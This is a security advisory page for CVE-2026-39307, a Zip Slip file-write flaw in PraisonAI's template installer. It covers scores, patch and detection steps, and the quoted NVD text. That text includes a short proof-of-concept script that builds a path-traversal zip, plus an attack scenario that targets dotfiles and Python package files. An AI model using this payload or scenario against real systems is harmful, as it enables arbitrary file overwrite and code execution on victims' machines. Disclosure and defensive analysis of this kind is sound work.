CVE-2026-39307 — HIGH (CVSS 8.1)

Q: Is CVE-2026-39307 actively exploited?

No confirmed active exploitation of CVE-2026-39307 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-39307?

1. PATCH IMMEDIATELY: Upgrade PraisonAI to version 4.5.113 or later — this is the only complete fix. 2. AUDIT: Review all templates installed from community sources (especially GitHub) prior to the patch date; check for unexpected files outside intended directories. 3. WORKAROUND (if patching is delayed): Only install templates from verified, internal sources; disable external template installation via network policy or firewall rules blocking GitHub raw content for the PraisonAI process. 4. DETECT: Search for recently modified files outside expected application directories following any `praisonai templates install` invocations; monitor for unexpected writes to /tmp, home directories, or system paths during template extraction. 5. HARDEN: For custom deployments, validate the fix in 4.5.113 uses safe path extraction (e.g., checking that each member's resolved path stays within the target directory before extraction). 6. POLICY: Treat community AI agent templates with the same risk posture as unverified third-party code — require internal review before installation in sensitive environments.

Q: What systems are affected by CVE-2026-39307?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development environments, training pipelines, CI/CD ML pipelines.

Q: What is the CVSS score for CVE-2026-39307?

CVE-2026-39307 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.07%.

CISO Take

PraisonAI's template installation feature fails to sanitize file paths in ZIP archives before extraction, allowing a crafted template to write files anywhere on the victim's filesystem via a classic Zip Slip attack (CWE-23). Any developer or AI engineer who runs `praisonai templates install` on a malicious template — whether tricked through social engineering or via a compromised community repository on GitHub — could have system files, dotfiles, or application code silently overwritten, escalating to full remote code execution. With no privileges required, network-accessible delivery, and a CVSS of 8.1, this is low-effort and high-impact; the CVE is not in CISA KEV and no public exploit scanner exists yet, but the PoC is trivially reproducible from the advisory itself, meaning any motivated actor can operationalize it within minutes. Upgrade all PraisonAI deployments immediately to version 4.5.113, and audit any community templates installed from unverified sources prior to the patch.

Sources: GitHub Advisory NVD ATLAS

What is the risk?

CVSS 8.1 HIGH with vector AV:N/AC:L/PR:N/UI:R reflects a network-delivered, low-complexity attack requiring only user interaction — exactly the kind of social engineering that targets AI practitioners installing community content. While not actively exploited (no KEV, no EPSS data), the Zip Slip technique is well-documented and the PoC is publicly disclosed in the GHSA advisory, dramatically lowering attacker barrier. The PraisonAI ecosystem attracts developers building multi-agent pipelines; this demographic often prioritizes speed over operational security hygiene, increasing the realistic exploitation surface. Impact is rated HIGH for both integrity (arbitrary file overwrite) and availability (system corruption), with a plausible path to RCE by overwriting startup scripts, cron jobs, or Python package files. Six other CVEs in the same package suggest a pattern of insufficient security review in PraisonAI's codebase.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
PraisonAI	pip	<= 4.5.112	`4.5.113`
1 dependents 84% patched ~0d to patch Full package profile →

Do you use PraisonAI? You're affected.

Severity & Risk

CVSS 3.1

8.1 / 10

EPSS

0.1%

chance of exploitation in 30 days

Higher than 21% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI Required

S Unchanged

C None

I High

A High

What should I do?

6 steps

PATCH IMMEDIATELY

Upgrade PraisonAI to version 4.5.113 or later — this is the only complete fix.
AUDIT

Review all templates installed from community sources (especially GitHub) prior to the patch date; check for unexpected files outside intended directories.
WORKAROUND (if patching is delayed): Only install templates from verified, internal sources; disable external template installation via network policy or firewall rules blocking GitHub raw content for the PraisonAI process.
DETECT

Search for recently modified files outside expected application directories following any praisonai templates install invocations; monitor for unexpected writes to /tmp, home directories, or system paths during template extraction.
HARDEN

For custom deployments, validate the fix in 4.5.113 uses safe path extraction (e.g., checking that each member's resolved path stays within the target directory before extraction).
POLICY

Treat community AI agent templates with the same risk posture as unverified third-party code — require internal review before installation in sensitive environments.

CISA SSVC Assessment

Decision Track*

Exploitation poc

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Supply Chain Code Execution Agent Framework AML.T0010.001 - AI Software AML.T0011 - User Execution AML.T0011.001 - Malicious Package AML.T0079 - Stage Capabilities AML.T0104 - Publish Poisoned AI Agent Tool

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 9 - Risk management system

ISO 42001

A.6.1.1 - Information security policies for AI supply chain

NIST AI RMF

GOVERN-6.1 - Policies and procedures for AI supply chain risk management

OWASP LLM Top 10

LLM03 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-39307?

PraisonAI's template installation feature fails to sanitize file paths in ZIP archives before extraction, allowing a crafted template to write files anywhere on the victim's filesystem via a classic Zip Slip attack (CWE-23). Any developer or AI engineer who runs `praisonai templates install` on a malicious template — whether tricked through social engineering or via a compromised community repository on GitHub — could have system files, dotfiles, or application code silently overwritten, escalating to full remote code execution. With no privileges required, network-accessible delivery, and a CVSS of 8.1, this is low-effort and high-impact; the CVE is not in CISA KEV and no public exploit scanner exists yet, but the PoC is trivially reproducible from the advisory itself, meaning any motivated actor can operationalize it within minutes. Upgrade all PraisonAI deployments immediately to version 4.5.113, and audit any community templates installed from unverified sources prior to the patch.

Is CVE-2026-39307 actively exploited?

No confirmed active exploitation of CVE-2026-39307 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-39307?

1. PATCH IMMEDIATELY: Upgrade PraisonAI to version 4.5.113 or later — this is the only complete fix. 2. AUDIT: Review all templates installed from community sources (especially GitHub) prior to the patch date; check for unexpected files outside intended directories. 3. WORKAROUND (if patching is delayed): Only install templates from verified, internal sources; disable external template installation via network policy or firewall rules blocking GitHub raw content for the PraisonAI process. 4. DETECT: Search for recently modified files outside expected application directories following any `praisonai templates install` invocations; monitor for unexpected writes to /tmp, home directories, or system paths during template extraction. 5. HARDEN: For custom deployments, validate the fix in 4.5.113 uses safe path extraction (e.g., checking that each member's resolved path stays within the target directory before extraction). 6. POLICY: Treat community AI agent templates with the same risk posture as unverified third-party code — require internal review before installation in sensitive environments.

What systems are affected by CVE-2026-39307?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI development environments, training pipelines, CI/CD ML pipelines.

What is the CVSS score for CVE-2026-39307?

CVE-2026-39307 has a CVSS v3.1 base score of 8.1 (HIGH). The EPSS exploitation probability is 0.07%.

Technical Details

NVD Description

The PraisonAI templates installation feature is vulnerable to a "Zip Slip" Arbitrary File Write attack. When downloading and extracting template archives from external sources (e.g., GitHub), the application uses Python's `zipfile.extractall()` without verifying if the files within the archive resolve outside of the intended extraction directory. ### Details Location: `src/praisonai/praisonai/cli/features/templates.py` (Line 852) Vulnerable Code snippet: ```python zip_ref.extractall(tmpdir) ``` During installation, the CLI downloads a ZIP archive and extracts it directly into a temporary directory using `zip_ref.extractall(tmpdir)`. A specially crafted ZIP archive can contain file entries with relative paths (such as `../../../../tmp/evil.sh`). If extracting this archive in older Python versions or environments where extraction rules aren't strict, `extractall` will write these files outside the target directory, allowing an attacker to overwrite arbitrary files on the victim's filesystem. ### PoC 1. Generate a malicious zip payload: ```python import zipfile with zipfile.ZipFile('malicious_template.zip', 'w') as z: # Adding a file that traverses directories z.writestr('../../../../../../../tmp/zip_slip_pwned.txt', 'pwned by zip slip') ``` 2. Trick a user into installing the malicious template: ```bash praisonai templates install github:attacker/malicious_template ``` 3. Observe the `zip_slip_pwned.txt` file created in `/tmp/` on the victim's machine. ### Impact This is an Arbitrary File Write vulnerability affecting any user who installs community templates. It can be leveraged to overwrite system files, user dotfiles, or application code, ultimately leading to system corruption or full Remote Code Execution (RCE).

Exploitation Scenario

An attacker creates a GitHub repository named something legitimate like `praisonai-enterprise-templates` or `langchain-agent-templates`, publishes a README with convincing documentation, and seeds initial stars. The repository contains a `templates.zip` archive where one or more entries use path traversal sequences (e.g., `../../../../home/user/.bashrc` or `../../../../usr/local/lib/python3.x/site-packages/praisonai/__init__.py`). The attacker then promotes the template in PraisonAI community channels, Discord servers, or via a phishing email targeting AI engineers. When a victim runs `praisonai templates install github:attacker/enterprise-templates`, the CLI fetches and extracts the ZIP without path validation, silently writing the malicious payload to the traversal target. If the target is a Python package file, subsequent imports execute attacker-controlled code; if it is a shell dotfile, the payload executes on next login. In a CI/CD context, the compromise propagates to every build run on that agent.